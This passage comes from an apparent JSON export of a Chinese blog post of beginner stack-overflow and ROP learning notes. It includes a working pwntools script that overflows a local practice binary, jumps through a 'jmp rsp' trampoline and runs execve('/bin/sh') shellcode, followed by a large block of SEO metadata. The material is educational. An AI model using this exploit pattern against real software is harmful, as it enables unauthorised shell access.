srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/U5C9CQ5D63WKN9F2.png 291w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/U5C9CQ5D63WKN9F2-150x32.png 150w\" sizes=\"auto, (max-width: 291px) 100vw, 291px\" \/><\/p>\n<p>\u641c\u4e00\u641c jmp rsp \u6765\u5f53\u8df3\u677f<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1529\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/8A37QRH_0Z3C2@9SQYO.png\" alt=\"\" width=\"501\" height=\"212\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/8A37QRH_0Z3C2@9SQYO.png 501w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/8A37QRH_0Z3C2@9SQYO-300x127.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/8A37QRH_0Z3C2@9SQYO-150x63.png 150w\" sizes=\"auto, (max-width: 501px) 100vw, 501px\" \/><\/p>\n<p>x64 \u4e0b\u4e00\u822c\u5f88\u96be\u641c\u5230 jmp rsp\uff0c\u800c\u5728 x86 \u4e0b jmp esp \u5374\u53ef\u4ee5\u5f88\u5bb9\u6613\u627e\u5230\u3002<\/p>\n<p>\u6240\u4ee5\u5728 x64 \u4e0b\u6211\u4eec\u7f16\u8bd1\u7684\u65f6\u5019\u5077\u5077\u52a0\u5165\u4e00\u4e2a\u65b0\u51fd\u6570<span class=\"lang:default decode:true  crayon-inline\">void dummy(){ __asm__(&#8220;nop; jmp rsp&#8221;); }<\/span> \u65b9\u4fbf\u8fbe\u5230\u6548\u679c\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1530\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/7HHP4037JSASYKOXR.png\" alt=\"\" width=\"417\" height=\"159\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/7HHP4037JSASYKOXR.png 417w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/7HHP4037JSASYKOXR-300x114.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/7HHP4037JSASYKOXR-150x57.png 150w\" sizes=\"auto, (max-width: 417px) 100vw, 417px\" \/><\/p>\n<p>\u6709\u4e86 jmp rsp \u505a\u8df3\u677f\u540e\uff0cpayload \u4e5f\u5f88\u597d\u6784\u9020\u4e86<\/p>\n<p>shellcode \u7684\u5177\u4f53\u6784\u9020\u65b9\u6cd5\u53ef\u89c1\uff1a<a href=\"https:\/\/bufferoverflows.net\/developing-custom-shellcode-x64-linux\/\">https:\/\/bufferoverflows.net\/developing-custom-shellcode-x64-linux\/<\/a><\/p>\n<pre class=\"lang:default decode:true\">from pwn import *\r\ncontext.arch = 'amd64'\r\nshellcode = b''\r\nshellcode += asm(\"xor rdx, rdx\")\r\nshellcode += asm(\"push rdx\")\r\nshellcode += asm(\"mov rax, 0x68732f2f6e69622f\")\r\nshellcode += asm(\"push rax\")\r\nshellcode += asm(\"mov rdi, rsp\")\r\nshellcode += asm(\"push rdx\")\r\nshellcode += asm(\"push rdi\")\r\nshellcode += asm(\"mov rsi, rsp\")\r\nshellcode += asm(\"xor rax, rax\")\r\nshellcode += asm(\"mov al, 0x3B\")\r\nshellcode += asm(\"syscall\")\r\npayload = b'C'*88 + p64(0x000000000060057e) + shellcode\r\np = process('.\/temp')\r\np.sendline(payload);\r\np.interactive();\r\n<\/pre>\n<p>\u6210\u529f getshell<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1531\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/L9YNNLDZMAOF7X022QST.png\" alt=\"\" width=\"373\" height=\"170\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/L9YNNLDZMAOF7X022QST.png 373w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/L9YNNLDZMAOF7X022QST-300x137.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/L9YNNLDZMAOF7X022QST-150x68.png 150w\" sizes=\"auto, (max-width: 373px) 100vw, 373px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>\uff08\u9644\uff1a\u82e5\u662f\u672a\u5f00\u542f ASLR \u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u4e0d\u4f7f\u7528\u8df3\u677f\uff0c\u76f4\u63a5\u786c\u7f16\u7801 shellcode \u7684\u5730\u5740\u6765\u5b9e\u73b0\u8f6c\u8df3\u3002<\/p>\n<p>\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0cASLR \u5728 Windows Vista \u624d\u88ab\u5f15\u5165\uff0c\u4e5f\u5c31\u662f\u8bf4 XP \u662f\u6ca1\u6709 ASLR \u7684\uff08\uff09<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_withnx\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>ASLR + NX<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u5e72\u4f60\u5988\u7684\uff0c\u4f5c\u4e1a\u4ed6\u5988\u5199\u4e0d\u5b8c\uff0c\u4e0d\u66f4\u4e86\u4e0d\u66f4\u4e86<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865 &hellip; <a href=\"https:\/\/0self.mnihyc.com\/blog\/archives\/1501\" class=\"more-link\">\u7ee7\u7eed\u9605\u8bfb<span class=\"screen-reader-text\">\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1501","post","type-post","status-publish","format-standard","hentry","category-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog<\/title>\n<meta name=\"description\" content=\"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/mnihyc.com\/blog\/archives\/1501\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn\" \/>\n<meta property=\"og:url\" content=\"https:\/\/mnihyc.com\/blog\/archives\/1501\" \/>\n<meta property=\"og:site_name\" content=\"mnihyc&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-07T19:27:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-08T10:04:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\" \/>\n<meta name=\"author\" content=\"mnihyc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:site\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"mnihyc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#article\",\"isPartOf\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501\"},\"author\":{\"name\":\"mnihyc\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"headline\":\"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55\",\"datePublished\":\"2020-05-07T19:27:41+00:00\",\"dateModified\":\"2020-05-08T10:04:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501\"},\"wordCount\":269,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"image\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\",\"articleSection\":[\"\u5b89\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/mnihyc.com\/blog\/archives\/1501#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501\",\"url\":\"https:\/\/mnihyc.com\/blog\/archives\/1501\",\"name\":\"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog\",\"isPartOf\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage\"},\"image\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\",\"datePublished\":\"2020-05-07T19:27:41+00:00\",\"dateModified\":\"2020-05-08T10:04:17+00:00\",\"description\":\"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn\",\"breadcrumb\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/mnihyc.com\/blog\/archives\/1501\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage\",\"url\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\",\"contentUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/mnihyc.com\/blog\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\",\"url\":\"https:\/\/mnihyc.com\/blog\/\",\"name\":\"mnihyc&#039;s Blog\",\"description\":\"Welcome!\",\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/mnihyc.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\",\"name\":\"mnihyc\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"caption\":\"mnihyc\"},\"logo\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog","description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/mnihyc.com\/blog\/archives\/1501","og_locale":"zh_CN","og_type":"article","og_title":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog","og_description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn","og_url":"https:\/\/mnihyc.com\/blog\/archives\/1501","og_site_name":"mnihyc&#039;s Blog","article_published_time":"2020-05-07T19:27:41+00:00","article_modified_time":"2020-05-08T10:04:17+00:00","og_image":[{"url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","type":"","width":"","height":""}],"author":"mnihyc","twitter_card":"summary_large_image","twitter_creator":"@mnihyc","twitter_site":"@mnihyc","twitter_misc":{"\u4f5c\u8005":"mnihyc","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"2 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#article","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501"},"author":{"name":"mnihyc","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"headline":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55","datePublished":"2020-05-07T19:27:41+00:00","dateModified":"2020-05-08T10:04:17+00:00","mainEntityOfPage":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501"},"wordCount":269,"commentCount":0,"publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"image":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","articleSection":["\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/mnihyc.com\/blog\/archives\/1501#respond"]}]},{"@type":"WebPage","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501","url":"https:\/\/mnihyc.com\/blog\/archives\/1501","name":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"image":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","datePublished":"2020-05-07T19:27:41+00:00","dateModified":"2020-05-08T10:04:17+00:00","description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn","breadcrumb":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/mnihyc.com\/blog\/archives\/1501"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage","url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","contentUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png"},{"@type":"BreadcrumbList","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/mnihyc.com\/blog"},{"@type":"ListItem","position":2,"name":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55"}]},{"@type":"WebSite","@id":"https:\/\/mnihyc.com\/blog\/#website","url":"https:\/\/mnihyc.com\/blog\/","name":"mnihyc&#039;s Blog","description":"Welcome!","publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/mnihyc.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751","name":"mnihyc","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","caption":"mnihyc"},"logo":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/comments?post=1501"}],"version-history":[{"count":0,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1501\/revisions"}],"wp:attachment":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/media?parent=1501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/categories?post=1501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/tags?post=1501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}